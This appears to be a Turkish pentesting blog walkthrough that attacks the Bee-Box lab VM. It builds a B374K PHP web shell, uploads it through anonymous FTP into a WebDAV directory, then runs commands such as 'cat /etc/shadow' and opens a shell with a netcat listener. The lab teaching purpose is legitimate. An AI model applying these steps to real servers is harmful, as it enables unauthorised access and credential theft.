Uygun Yapılandırılmamış Web Uygulamalarında WebDAV Uzantısı ve Anonim FTP Servisi Kötüye Kullanılarak İşletim Sistemi Üzerinde Komut Çalıştırılması

0
263
views
WebDAV özelliği etkinleştirilmiş ve anonim FTP servisi sunan web uygulamalarında yeterli güvenlik önlemleri alınmamışsa, bu yapılandırmalar kötüye kullanılabilir. Bu yazıda Bee-Box sanal makinesi üzerinde ortak olarak yapılandırılmış WebDAV dizini ve anonim FTP dizinine bir zararlı web shell dosyası atılacak ve işletim sisteminin komut satırına erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Not: Yazıda kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

Bu yazıda istismar edilecek olan WebDAV zafiyetini istismar etmek için Documents dizini altına dosya yüklenecektir.

 

Bu amaçla internetten indirilen B374K zararlı PHP uygulaması kullanılabilir.

git clone https://github.com/b374k/b374k.git
ls -la b374k/
cd b374k/
php –f index.php — -o zararli.php –p Parola123

 

Hazırlanan dosya içeriği aşağıdaki gibidir.

ls -la zararli.php
head -10 zararli.php
tail -10 zararli.php

 

Zafiyetli uygulamayı barındıran sunucuda anonim FTP servisi hizmet vermektedir. Bu servise erişildiğinde Documents sayfası altındaki dosyaların listelendiği görülmektedir. Bu dizine yazma yetkisinin de olduğu ve hazırlanan zararlı PHP dosyasının yüklenebildiği görülmektedir.

ftp 10.10.2.130
anonymous
HerhangiBirParola
put zararli.php zararli-sayfa.php
ls -la

 

Böylece yüklenen dosya web üzerinden listelenmektedir.

http://10.10.2.130/bWAPP/documents/

 

Yüklenen sayfaya girildiğinde çıkan ekranda bir bilgi istenmektedir. Belirlenen parola değeri (“Parola123”) girilir.

 

Açılan sayfada web uygulaması (www-data) yetkileri ile dosya listeleme, komut satırında komut çalıştırma, PHP fonksiyonlarını çalıştırma, network bağlantısı kurma,… işlemleri gerçekleştirilebilir.

id; uname -a; head -3 /etc/passwd
cat /etc/shadow

 

Network sekmesi ile çeşitli yöntemlerle (Bind Shell, Reverse Shell, Simple Packet Crafter) bağlantı elde edilebilir.

nc -l -v -p 13579

 

Böylece “nc” ile komut satırı erişimi de elde edilmiş olur.

hostname
id

 

Kaynak:

https://paulsec.github.io/blog/2014/04/21/bwapp-write-up/

Web Shells Penetration Testing (Beginner Guide)


https://www.youtube.com/watch?v=AMxW-VI3SgY

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.